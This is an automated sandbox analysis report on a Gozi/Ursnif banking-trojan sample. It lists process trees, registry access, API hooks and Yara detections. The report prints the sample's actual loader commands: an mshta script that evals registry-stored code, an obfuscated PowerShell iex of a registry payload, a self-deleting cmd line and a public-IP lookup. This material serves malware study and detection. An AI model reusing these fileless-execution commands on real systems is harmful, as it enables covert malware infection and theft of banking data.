Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030529E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	47_2_030529E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03047523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	47_2_03047523
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03031641 memset,NtQueryInformationProcess,	47_2_03031641
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03047EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	47_2_03047EEF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303155B NtQuerySystemInformation,RtlNtStatusToDosError,	47_2_0303155B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304E4D5 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	47_2_0304E4D5

Source: gozi.exe	Binary or memory string: OriginalFilename vs gozi.exe
Source: gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameAdMunch.exe6 vs gozi.exe
Source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameEventManager.dll: vs gozi.exe

Source: gozi.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: gozi.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\gozi.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gozi.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winEXE@35/22@10/2

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: gozi.exe	Virustotal: Detection: 38%
Source: gozi.exe	Metadefender: Detection: 40%
Source: gozi.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\gozi.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\gozi.exe "C:\Users\user\Desktop\gozi.exe"
Source: C:\Users\user\Desktop\gozi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8712.tmp" "c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gozi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8712.tmp" "c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdpkmtso.umo.ps1

Jump to behavior

Source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp	Binary or memory string: INSERT INTO `users` (`Login`, `Password`, `Role`) VALUES(@uLogin, @uPassword, @uRole);
Source: gozi.exe	Binary or memory string: SELECT * FROM `transport`;
Source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp	Binary or memory string: INSERT INTO `transport` (`Type`, `Consumption`) VALUES(@uType, @uCons);
Source: gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp	Binary or memory string: INSERT INTO `waybills` (`DriverId`, `TransportId`, `Distance`, `Price`, `Date`) VALUES(@DriverId, @TransportId, @Distance, @Price, @Date);
Source: gozi.exe	Binary or memory string: SELECT * FROM `drivers` WHERE `Login` = @uLogin;
Source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp	Binary or memory string: SELECT * FROM `users` WHERE `Login` = @uLogin AND `Password` = @uPassword;
Source: gozi.exe	Binary or memory string: SELECT * FROM `drivers` WHERE `Id` = @Id;
Source: gozi.exe	Binary or memory string: SELECT * FROM `transport` WHERE `Id` = @Id;
Source: gozi.exe	Binary or memory string: SELECT * FROM `waybills`;

Source: C:\Users\user\Desktop\gozi.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_010A1141 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

8_2_010A1141

Source: C:\Windows\System32\control.exe

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4292:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{C2944618-39CD-4415-D316-7DB8B7AA016C}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4580:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\{C68D421A-6D0A-E8E8-275A-F19C4B2EB590}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6E68996D-F514-D0A1-EF82-F90493D63D78}
Source: C:\Windows\SysWOW64\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\{3AB6673A-5150-7C4D-AB0E-15700F2219A4}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_01
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{22921B96-19EB-A4D9-B376-5D18970AE1CC}

Source: gozi.exe, transport_manager/MainPage.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Users\user\Desktop\gozi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\gozi.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: gozi.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: gozi.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source: gozi.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdbXP source: powershell.exe, 00000016.00000002.586031203.000002033C29E000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdb source: powershell.exe, 00000016.00000002.585762448.000002033C236000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\New folder\bin\Debug\SLN\transport-manager\obj\Debug\transport-manager.pdb source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdbXP source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source:	Binary string: EventManager.pdb source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp
Source:	Binary string: Local\{6FD9BC09-0238-7997-8413-56BDF8F7EA41}n.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: gozi.exe, transport_manager/MainPage.cs	.Net Code: MainPage_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs	.Net Code: MainPage_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs	.Net Code: MainPage_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010AB72E push ecx; ret	8_2_010AB734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A7F4F push ecx; ret	8_2_010A7F5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A7BE0 push ecx; ret	8_2_010A7BE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010AB804 push 00000055h; iretd	8_2_010AB808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010AB6BE push ebp; retf	8_2_010AB6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F2541F push ecx; ret	8_2_03F2542F
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E772FD push 3B000001h; retf	28_2_00E77302
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA72FD push 3B000001h; retf	36_2_0000020FDEAA7302
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03055070 push ecx; ret	47_2_03055079
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03053D42 push ss; ret	47_2_03053D43
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0305541F push ecx; ret	47_2_0305542F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_004012E6 LoadLibraryA,GetProcAddress,

8_2_004012E6

Source: gozi.exe

Static PE information: 0xBF44DD64 [Tue Sep 8 18:09:40 2071 UTC]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline	Jump to behavior

Source: initial sample

Static PE information: section name: .text entropy: 7.33101766252

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\5n300s0s.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\hscan34n.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFC8BAF521C

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFC8BAF5200

Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
